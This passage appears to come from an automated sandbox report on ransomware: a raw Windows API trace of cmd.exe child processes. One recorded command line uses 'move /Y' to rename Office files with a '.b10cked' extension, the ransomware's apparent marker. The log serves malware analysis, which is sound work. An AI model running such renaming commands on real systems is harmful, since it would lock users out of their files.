lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.390] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.391] GetConsoleTitleW (in: lpConsoleTitle=0x2308e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.393] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.393] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.393] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.393] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.393] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.393] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.395] GetConsoleTitleW (in: lpConsoleTitle=0x18f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.396] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.396] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.396] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.396] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.396] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.396] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.396] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.396] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.396] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.396] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.396] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.396] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.396] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.396] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.396] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.398] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f51c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f514, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f514*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.399] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.399] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.399] _wcsicmp (_String1="MSWINP~2.HXN", _String2=".") returned 63 [0204.399] _wcsicmp (_String1="MSWINP~2.HXN", _String2="..") returned 63 [0204.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~2.hxn")) returned 0x2022 [0204.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.400] SetErrorMode (uMode=0x0) returned 0x0 [0204.400] SetErrorMode (uMode=0x1) returned 0x0 [0204.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", nBufferLength=0x104, lpBuffer=0x18eea4, lpFilePart=0x18ee8c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", lpFilePart=0x18ee8c*="MSWINP~2.HXN") returned 0x27 [0204.400] SetErrorMode (uMode=0x0) returned 0x1 [0204.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.400] _wcsicmp (_String1="MSWINP~2.HXN", _String2=".") returned 63 [0204.400] _wcsicmp (_String1="MSWINP~2.HXN", _String2="..") returned 63 [0204.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~2.hxn")) returned 0x2022 [0204.922] SetErrorMode (uMode=0x0) returned 0x0 [0204.922] SetErrorMode (uMode=0x1) returned 0x0 [0204.922] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", nBufferLength=0x104, lpBuffer=0x18f320, lpFilePart=0x18f0b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", lpFilePart=0x18f0b8*="MSWINP~2.HXN") returned 0x27 [0204.922] SetErrorMode (uMode=0x0) returned 0x1 [0204.922] SetErrorMode (uMode=0x0) returned 0x0 [0204.922] SetErrorMode (uMode=0x1) returned 0x0 [0204.923] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f528, lpFilePart=0x18f0b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked", lpFilePart=0x18f0b8*="MS.WINPROJ.DEV.14.1033.hxn.b10cked") returned 0x3d [0204.923] SetErrorMode (uMode=0x0) returned 0x1 [0204.923] SetLastError (dwErrCode=0x0) [0204.923] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winproj.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0204.923] GetLastError () returned 0x2 [0204.923] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ea34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea34) returned 0x230e90 [0204.923] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x18ea34 | out: lpFindFileData=0x18ea34) returned 0 [0204.924] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.924] GetLastError () returned 0x12 [0204.924] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ea34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea34) returned 0x230e90 [0204.924] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x18ea34 | out: lpFindFileData=0x18ea34) returned 0 [0204.924] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.924] GetLastError () returned 0x12 [0204.925] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf8) returned 0x230e90 [0204.925] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x241bf8 | out: lpFindFileData=0x241bf8) returned 0 [0204.925] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.926] GetLastError () returned 0x12 [0204.926] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf8) returned 0x230e90 [0204.926] FindNextFileW (in: hFindFile=0x230e90, lpFindFileData=0x241bf8 | out: lpFindFileData=0x241bf8) returned 0 [0204.926] FindClose (in: hFindFile=0x230e90 | out: hFindFile=0x230e90) returned 1 [0204.926] GetLastError () returned 0x12 [0204.926] _get_osfhandle (_FileHandle=2) returned 0xb [0204.926] GetFileType (hFile=0xb) returned 0x2 [0204.926] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.926] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ec04 | out: lpMode=0x18ec04) returned 1 [0204.926] _get_osfhandle (_FileHandle=2) returned 0xb [0204.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ec38 | out: lpConsoleScreenBufferInfo=0x18ec38) returned 1 [0204.927] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ec78 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.928] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18ec5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ec5c*=0x2c) returned 1 [0204.930] longjmp () [0204.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.930] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.938] SetConsoleInputExeNameW () returned 0x1 [0204.942] GetConsoleOutputCP () returned 0x1b5 [0204.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.946] exit (_Code=1) Process: id = "484" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169c0" os_pid = "0x89c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29451 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29452 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29453 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29454 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 29455 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29456 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29457 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29458 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29459 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29460 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29903 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29904 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29905 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29906 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 29907 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29908 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29909 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29910 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29911 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29912 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29913 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29914 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29915 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29916 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 29917 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29918 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29919 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29920 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29921 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29922 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29923 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 29924 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 29925 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 29982 start_va = 0x1270000 end_va = 0x132ffff entry_point = 0x1270000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 681 os_tid = 0xde0 [0202.442] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7e4 | out: lpSystemTimeAsFileTime=0x28f7e4*(dwLowDateTime=0xad79b400, dwHighDateTime=0x1d440a9)) [0202.442] GetCurrentProcessId () returned 0x89c [0202.443] GetCurrentThreadId () returned 0xde0 [0202.443] GetTickCount () returned 0x39221 [0202.443] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7dc | out: lpPerformanceCount=0x28f7dc*=25923177635) returned 1 [0202.443] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.443] __set_app_type (_Type=0x1) [0202.443] __p__fmode () returned 0x76b331f4 [0202.443] __p__commode () returned 0x76b331fc [0202.443] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.443] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.443] GetCurrentThreadId () returned 0xde0 [0202.443] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x38 [0202.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.444] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.444] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.444] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f774 | out: phkResult=0x28f774*=0x0) returned 0x2 [0202.444] VirtualQuery (in: lpAddress=0x28f7ab, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.444] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.444] GetConsoleOutputCP () returned 0x1b5 [0202.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.444] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.445] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.445] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.445] GetEnvironmentStringsW () returned 0x80180* [0202.445] FreeEnvironmentStringsW (penv=0x80180) returned 1 [0202.445] GetEnvironmentStringsW () returned 0x80180* [0202.445] FreeEnvironmentStringsW (penv=0x80180) returned 1 [0202.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0202.445] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0xa8, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, 